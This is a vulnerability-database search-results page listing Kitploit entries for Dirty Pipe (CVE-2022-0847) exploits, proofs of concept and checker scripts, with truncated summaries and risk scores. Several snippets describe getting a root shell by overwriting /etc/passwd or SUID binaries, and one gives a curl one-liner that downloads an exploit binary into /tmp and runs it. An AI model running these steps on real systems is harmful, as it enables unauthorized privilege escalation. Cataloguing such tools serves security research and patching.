Lucene search
+L

162 matches found

Kitploit
Kitploit
added 2026/09/01 7:24 p.m.4 views

CVE-2022-0847-DirtyPipe-Exploits

CVE-2022-0847-DirtyPipe-Exploits A collection of exploits and documentation for penetration testers and red teamers that can be used to aid the exploitation of the Linux Dirty Pipe vulnerability. About The Vulnerability Dirty Pipe CVE-2022-0847 is a local privilege escalation vulnerability in the...

7.8CVSS6.9AI score0.89721EPSS
SaveExploits101References2
Kitploit
Kitploit
added 2026/09/01 7:21 p.m.4 views

traitor

Traitor Explota automáticamente objetivos fáciles para obtener una shell root. ¡Escalada de privilegios en Linux hecha fácil! Traitor agrupa un montón de métodos para explotar malas configuraciones y vulnerabilidades locales con el fin de obtener una shell root: Casi todos los GTFOBins docker.soc...

7.8CVSS6.9AI score0.89721EPSS
SaveExploits101References2
Kitploit
Kitploit
added 2026/09/01 6:50 p.m.3 views

dirtyPipe-automaticRoot

Dirty Pipe automatic root exploit CVE-2022-0847 Dependencies: Python 3.10 or above How to use: Automatic root: root@kitploit: $ python3.10 dirtyPipe.py -a + hjacking super user in /etc/passwd + dropipng shell Write a no write permission, immutable or read-only mounted file: root@kitploit: $...

7.8CVSS6.9AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/09/01 6:37 p.m.4 views

dpipe

dpipe Proof-of-concept exploit for the Dirty Pipe vulnerability CVE-2022-0847...

7.8CVSS6.9AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/09/01 6:13 p.m.3 views

Dirtypipe-exploit

Dirtypipe-exploit Dirty Pipe CVE-2022-0847 PoC that hijacks a SUID binary to spawn. a root shell. and attempts to restore the damaged binary as well...

7.8CVSS6.9AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/09/01 6:04 p.m.4 views

CVE-2022-0847-dirty-pipe-checker

CVE-2022-0847-dirty-pipe-checker Script Bash para comprobar CVE-2022-0847 Dirty Pipe Resumen Esta es la historia de CVE-2022-0847, una vulnerabilidad en el kernel de Linux desde la versión 5.8 que permite sobrescribir datos en archivos de solo lectura arbitrarios. Esto conduce a una escalada de...

7.8CVSS6.9AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/09/01 5:37 p.m.6 views

CVE-2022-0847-Docker

Dirty Pipe CVE-2022-0847: A Hands-On Exploit Demonstration in Docker This repository provides a self-contained, interactive Docker environment to safely demonstrate and analyze the "Dirty Pipe" privilege escalation vulnerability. It is designed as an educational tool for security professionals to...

7.8CVSS7AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/09/01 5:21 p.m.3 views

dirtypipe

reF: https://access.redhat.com/security/vulnerabilities/RHSB-2022-002 Diagnose A vulnerability detection script has been developed to determine if your system is currently affected by this flaw. To verify the authenticity of the script, you can download the detached OpenPGP signature as well...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/01 5:19 p.m.4 views

Dirty-Pipe-Exploit

Dirty-Pipe-Exploit The Dirty Pipe exploit CVE-2022-0847 is a Linux kernel vulnerability v5.8+ allowing unprivileged attackers to overwrite arbitrary files via a flaw in the pipe mechanism. This leads to privilege escalation, granting root access. Similar to Dirty Cow but easier to exploit. Fix:...

7.8CVSS6.9AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/09/01 2:04 p.m.4 views

CVE-2022-0847

CVE-2022-0847 my personal poc and exploit of CVE-2022-0847dirty pipe Usage POC: write files arbitrarily Just a simply POC of this CVE, compile the file poc.c as follow: root@kitploit: $ gcc poc.c -o poc -static You shall run it as follow: root@kitploit: ./poc targetfile offsetinfile data You shal...

7.8CVSS6.9AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/09/01 1:52 p.m.4 views

cve-2022-0847dirtypipe-exploit

cve-2022-0847dirtypipe-exploit...

7.8CVSS7AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/09/01 1:36 p.m.5 views

Dirty-Pipe

Oneline Exploit CVE-2022-0847 root@kitploit: curl,-s,-k,https://raw.githubusercontent.com/carlosevieira/Dirty-Pipe/main/exploit-static,-o,/tmp/exploit-dirty-pipe;chmod,+x,/tmp/exploit-dirty-pipe;/tmp/exploit-dirty-pipe...

7.8CVSS6.9AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/09/01 1:16 p.m.2 views

CVE-2022-0847

CVE-2022-0847 Reference: Dirty Pipe vulnerability introduction PoC 1. Check kernel version root@kitploit: uname -r 2. Compile and execute root@kitploit: gcc poc.c...

7.8CVSS6.9AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/09/01 7:01 a.m.4 views

CVE-2022-0847-dirty-pipe-checker

CVE-2022-0847-dirty-pipe-checker Bash script to check for CVE-2022-0847 "Dirty Pipe" https://dirtypipe.cm4all.com/ Usage Check current kernel version root@kitploit: ./dpipe.sh Check specific kernel version root@kitploit: ./dpipe.sh 5.10.11...

7.8CVSS6.9AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/09/01 5:56 a.m.3 views

CVE-2022-0847-Container-Escape

CVE-2022-0847 CVE-2022-0847 used to achieve container escape overwrite any read-only files on host Slides in Chinese available here 利用CVE-2022-0847 Dirty Pipe 实现容器逃逸(效果为覆写宿主机上任意只读文件) 中文汇报PPT在这里 Introduction If the kernel is vulnerable to CVE-2022-0847, the attacker can overwrite read-only files...

7.8CVSS7AI score0.89721EPSS
SaveExploits101References1
Kitploit
Kitploit
added 2026/09/01 5:43 a.m.5 views

cve-2022-0847dirtypipe-exploit

cve-2022-0847dirtypipe-exploit...

7.8CVSS7AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/09/01 1:31 a.m.6 views

CVE-2022-0847

CVE-2022-0847 Original link https://dirtypipe.cm4all.com/ Usage gcc exploit.cpp -o exploit ./exploitIt will spawn a root shell Vulnerability description This is CVE-2022-0847, a vulnerability in the Linux kernel since version 5.8 that allows overwriting data in arbitrary read-only files. This lea...

7.8CVSS6.9AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/31 5:53 p.m.6 views

dirty-pipe-poc

POC Exploit para agregar usuario a Sudo para CVE-2022-0847 Vulnerabilidad Dirty Pipe Este repositorio está basado en la Vulnerabilidad, el Writeup y el Exploit producidos por Max Kellermann que se encuentran todos aquí. Como todos, tuve que aprovechar jugar con la escalada de privilegios más...

7.8CVSS6.9AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/31 4:53 p.m.5 views

CVE-2022-0847-POC

CVE-2022-0847 CRÉDITOS: root@kitploit: autor de la vulnerabilidad: Max Kellermann explicación de Max Kellermann: https://dirtypipe.cm4all.com/ RECURSOS: root@kitploit: CACHÉ DE PÁGINA: https://manybutfinite.com/post/page-cache-the-affair-between-memory-and-files/ PIPE:...

7.8CVSS6.9AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/31 3:32 p.m.3 views

Dirty-Pipe-CVE-2022-0847

Dirty-Pipe-CVE-2022-0847 CVE-2022-0847 Dirty Pipe is an arbitrary file overwrite vulnerability that allows escalation of privileges by modifying or overwriting arbitrary read-only files e.g. /etc/passwd, /etc/shadow. Steps 1. Compile using gcc cve-2022-0847-exploit.c -o cve-2022-0847-exploit 2. R...

7.8CVSS7AI score0.89721EPSS
SaveExploits101
Rows per page
Query Builder